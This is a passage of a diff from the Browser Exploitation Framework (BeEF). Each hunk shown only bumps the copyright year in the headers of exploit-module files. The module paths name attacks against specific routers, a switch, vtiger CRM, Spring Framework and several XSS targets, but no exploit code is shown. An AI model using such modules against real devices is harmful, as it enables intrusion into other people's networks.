@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
index 3b2bd4cf8..d0417c2fb 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
index 27dd2f6c7..ab3b12fb0 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
index 71d437a74..55645a6cb 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js
index a95814ee7..7cb16cccd 100644
--- a/modules/exploits/router/bt_home_hub_csrf/command.js
+++ b/modules/exploits/router/bt_home_hub_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/bt_home_hub_csrf/config.yaml b/modules/exploits/router/bt_home_hub_csrf/config.yaml
index 22f169ec0..64c6468a0 100644
--- a/modules/exploits/router/bt_home_hub_csrf/config.yaml
+++ b/modules/exploits/router/bt_home_hub_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/bt_home_hub_csrf/module.rb b/modules/exploits/router/bt_home_hub_csrf/module.rb
index 6f68fe9c8..23dac4cf4 100644
--- a/modules/exploits/router/bt_home_hub_csrf/module.rb
+++ b/modules/exploits/router/bt_home_hub_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js
index bff4d2a4b..fc226fa83 100644
--- a/modules/exploits/router/cisco_e2400_csrf/command.js
+++ b/modules/exploits/router/cisco_e2400_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/cisco_e2400_csrf/config.yaml b/modules/exploits/router/cisco_e2400_csrf/config.yaml
index c9be4d3ea..3602c11af 100644
--- a/modules/exploits/router/cisco_e2400_csrf/config.yaml
+++ b/modules/exploits/router/cisco_e2400_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/cisco_e2400_csrf/module.rb b/modules/exploits/router/cisco_e2400_csrf/module.rb
index 418b654ac..51e286038 100644
--- a/modules/exploits/router/cisco_e2400_csrf/module.rb
+++ b/modules/exploits/router/cisco_e2400_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index 47709ed73..ec750b7e3 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
index 9ad6c0ba7..641dbdfa7 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5367_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/module.rb b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
index 1bc06fb2c..44278f378 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5367_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index 4dbe00969..1b740b447 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
index 192703c9b..4b1df0668 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
+++ b/modules/exploits/router/comtrend_ct5624_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/module.rb b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
index b22a1c9e9..6d4b690ae 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/module.rb
+++ b/modules/exploits/router/comtrend_ct5624_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js
index ac96420c6..3adb3b1fe 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/command.js
+++ b/modules/exploits/router/dlink_dir_615_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/dlink_dir_615_csrf/config.yaml b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
index d2ba3fabf..eec7a5fd5 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dir_615_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/dlink_dir_615_csrf/module.rb b/modules/exploits/router/dlink_dir_615_csrf/module.rb
index 1c2d4313a..0d400c84a 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/module.rb
+++ b/modules/exploits/router/dlink_dir_615_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index 20b7eca63..f546bb08a 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
index 735bc0357..ad849fb86 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
+++ b/modules/exploits/router/dlink_dsl500t_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/module.rb b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
index 18a0c65fe..78b358462 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/module.rb
+++ b/modules/exploits/router/dlink_dsl500t_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index db42a848c..9ce6b9f2e 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml
index 07ee01588..7febce906 100644
--- a/modules/exploits/router/huawei_smartax_mt880/config.yaml
+++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb
index 1cda0dcc3..ce8c3ff77 100644
--- a/modules/exploits/router/huawei_smartax_mt880/module.rb
+++ b/modules/exploits/router/huawei_smartax_mt880/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js
index f09e89f23..6580abf95 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/command.js
+++ b/modules/exploits/router/linksys_befsr41_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
index 663e1c058..d6678fa30 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml
+++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb
index b2e0a6582..96044225b 100644
--- a/modules/exploits/router/linksys_befsr41_csrf/module.rb
+++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
index 4f76fb710..3eb5248e8 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
index 7d8439e5b..ca2aa920b 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
index adbce13ac..15e6082f7 100644
--- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js
index 3959cb0ae..c235e32a2 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/command.js
+++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
index fe4845565..e91577f32 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
+++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
index 4641c3a31..cffed8877 100644
--- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb
+++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index 89ab00810..ca60fc0e9 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
index b4016b540..b0e6077c5 100644
--- a/modules/exploits/router/virgin_superhub_csrf/config.yaml
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
index c815843ac..3d2f288cd 100644
--- a/modules/exploits/router/virgin_superhub_csrf/module.rb
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
index cf4e73799..084e32bac 100644
--- a/modules/exploits/spring_framework_malicious_jar/command.js
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
index c47fe917d..5ed114fb4 100644
--- a/modules/exploits/spring_framework_malicious_jar/config.yaml
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb
index 81fb3e9c8..0138bbb5a 100644
--- a/modules/exploits/spring_framework_malicious_jar/module.rb
+++ b/modules/exploits/spring_framework_malicious_jar/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js
index d812993dc..67e926e4b 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/command.js
+++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
index 6d363e279..cb2e1d2e7 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
+++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
index 0dda11a2b..ccccd03ae 100644
--- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb
+++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js
index 4702ad6df..25b6ea251 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/command.js
+++ b/modules/exploits/vtiger_crm_upload_exploit/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
index 470e0f742..d714c7909 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml
+++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb
index 16483715b..f355946bf 100644
--- a/modules/exploits/vtiger_crm_upload_exploit/module.rb
+++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js
index 7f6fe06e6..f8e66229e 100644
--- a/modules/exploits/wanem_command_execution/command.js
+++ b/modules/exploits/wanem_command_execution/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml
index 42660a410..ce2d3f2d7 100644
--- a/modules/exploits/wanem_command_execution/config.yaml
+++ b/modules/exploits/wanem_command_execution/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb
index ca8d01c1b..0f67e929e 100644
--- a/modules/exploits/wanem_command_execution/module.rb
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
index 562181c00..7a0e8c0eb 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
index 5f5a8926a..b69f3adce 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
index 9070c0f95..5c7df6000 100644
--- a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
+++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
index ff643b786..1da723675 100644
--- a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
+++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
